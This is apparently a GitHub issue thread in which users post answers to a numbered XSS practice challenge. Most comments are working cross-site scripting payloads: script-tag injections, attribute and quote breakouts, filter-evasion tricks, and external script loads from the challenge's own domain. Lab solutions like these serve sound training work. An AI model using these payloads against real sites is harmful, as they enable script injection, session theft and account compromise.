-
Notifications
You must be signed in to change notification settings - Fork 59
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
答案 (一层楼一个,欢迎补充背景资料) #1
Comments
0x01
|
0x02
|
0x03<script>alert`1`</script> 补了篇总结,年纪大了容易忘就记录下来咯 |
0x04
|
0x05
|
0x06
|
0x07
|
0x08</style ><script>alert(1)</script>
|
0x09 || 0x0Ahttps://www.segmentfault.com.haozi.me/j.js
|
0x0B<script src="https://www.segmentfault.com.haozi.me/j.js"></script>
|
0x0C<scscriptript src="https://www.segmentfault.com.haozi.me/j.js"></scripscriptt>
|
0x0D
alert(1)
-->
|
0x0E<ſcript src="https://xss.haozi.me/j.js"></script>
|
0x0F');alert('1
|
0x10'';alert(1) |
0x11"),alert("1 |
0x12\");alert(1)//
|
0x12
直接新建一个script标签里面包含alert |
0x05--!><script>alert(1)</script> |
0x06onmouseover |
0x0A |
0x07
|
0x08
|
"onmouseover="alert(document.domain) |
0x09https://www.segmentfault.com/" onload=alert(1)>// |
"><script>alert(1)</script> |
0x07<img src onerror=alert(1)// |
<script>window.onerror=eval;throw'=alert\x281\x29'</script 你好,这句的原理是因为 = 报错所以弹窗吗 |
0x09
|
0x09与0x0A
补充一下,必须使用火狐浏览器,不知道为什么Google内核就不可以 |
0x09
|
--!><script>alert(1)</script> |
0x12</script>
<script>alert(1)</script> |
这个答案我在firefox和Google都不行了,因为url被大写后 <ſcript src="https://xss.haozi.me/%6A%2E%6A%73"></script> |
0x9随便写一个不存在的脚本, 然后写
|
0x0A现在有正确的答案吗 |
重在思路,自己部署个域名好了,这个域名现在挂了 |
0x0B
|
0x03
|
0X06
|
0X09
|
0X0A
|
https://www.segmentfault.com.haozi.me/j.js |
0x03||0x04<iframe src="javascript:parent.alert%281%29"> |
alert(1) Also available |
0x00
The text was updated successfully, but these errors were encountered: